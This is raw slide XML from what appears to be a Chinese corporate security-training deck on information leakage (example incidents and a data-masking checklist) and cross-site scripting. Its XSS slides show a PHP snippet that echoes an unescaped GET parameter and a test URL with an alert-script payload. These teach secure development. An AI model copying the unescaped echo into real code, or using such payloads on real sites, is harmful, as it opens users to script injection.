                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="457200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信息泄露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返回结果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接口返回中的敏感信息有正确打码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姓名、昵称、手机号、收货地址、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pin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等</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3810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外部敏感信息，内部非敏感信息，有正确打码或者命名不能太过直白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黑名单风控等级</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3962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请求接口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请求接口中的敏感信息正确打码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手机号、密码、银行卡号等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9" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="691007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+mn-ea"/>
              </a:rPr>
              <a:t>信息泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>案例和测试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49275" y="5311140"/>
            <a:ext cx="5001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2018年安全案例分析&amp;安全测试checklist</a:t>
            </a:r>
          </a:p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https://cf.jd.com/pages/viewpage.action?pageId=109441501</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549275" y="1366520"/>
            <a:ext cx="10197465" cy="17684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案例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上传脚本到github，泄漏账号密码</a:t>
            </a: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离职员工将工作邮件备份到网盘</a:t>
            </a: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小程序跳转H5，url传参cookie时含有敏感信息</a:t>
            </a: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wqcoss.jd.com/mcoss/label/show接口返回敏感信息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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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2" grpId="0"/>
      <p:bldP spid="16" grpId="0"/>
      <p:bldP spid="26" grpId="2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23" y="-70"/>
            <a:ext cx="11518986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90">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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1271270" y="2425065"/>
            <a:ext cx="9090660" cy="1701800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F67800"/>
            </a:solidFill>
          </a:ln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250000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef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2018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年微信手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Q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案例文件已上传到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cf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1216660">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/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https://cf.jd.com/pages/viewpage.action?pageId=149257558</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pP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占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="6120680" cy="6477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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞文件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sz="5400" b="1" dirty="0"/>
              <a:t>感谢聆听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864493" y="2270645"/>
            <a:ext cx="5329238" cy="570420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>THANKS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594360" y="1377315"/>
            <a:ext cx="3806825" cy="4253230"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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假设页面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把用户输入的参数直接输出到页面上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&lt;?php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$input = $_GET["param"];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echo "&lt;div&gt;".$input."&lt;/div&gt;";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?&gt;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58385" y="1305560"/>
            <a:ext cx="5753735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但是如果提交一段HTML代码：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http://127.0.0.1/test.php?param=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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&lt;script&gt;alert("xss")&lt;/script&gt;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Firefox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浏览器中：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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350" y="2705100"/>
            <a:ext cx="6071235" cy="29254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10" y="1689100"/>
            <a:ext cx="1826260" cy="12160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75790" y="1946275"/>
            <a:ext cx="19881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XSS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例子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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594360" y="1377315"/>
            <a:ext cx="3806825" cy="4253230"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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假设页面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把用户输入的参数直接输出到页面上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&lt;?php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$input = $_GET["param"];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echo "&lt;div&gt;".$input."&lt;/div&gt;";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?&gt;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58385" y="1305560"/>
            <a:ext cx="6423025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但是如果提交一段HTML代码：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http://127.0.0.1/test.php?param=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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&lt;script&gt;alert("xss")&lt;/script&gt;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Firefox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浏览器中，右键查看页面源代码，用户输入的Script脚本被写入页面：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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520" y="2774315"/>
            <a:ext cx="6358890" cy="932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10" y="1689100"/>
            <a:ext cx="1826260" cy="12160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75790" y="1946275"/>
            <a:ext cx="19881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XSS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例子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4231"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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18*i*20"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2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5"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_5"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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5_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_5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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 5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50923145735"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_18"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="18"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="6"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="85*179"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="790*297"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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18*i*0"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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18*i*5"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="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18*i*10"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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18*i*15"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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18*i*20"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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18*i*25"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="25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6"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_6"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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6_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_6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5"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_5"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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5_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_5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4"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_4"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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4_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_4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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_3"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_3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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_2"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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2_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_2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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_i*1_1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-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1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160564_18*l_h_f*1_1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 1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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 5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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Freeform 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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 3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1857"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="矩形 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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="342*30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4231"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Rectangle 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SubTitleText"/>
  <p:tag name="MH" val="20150923150227"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160564"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160564_19"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="19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491*182"/>
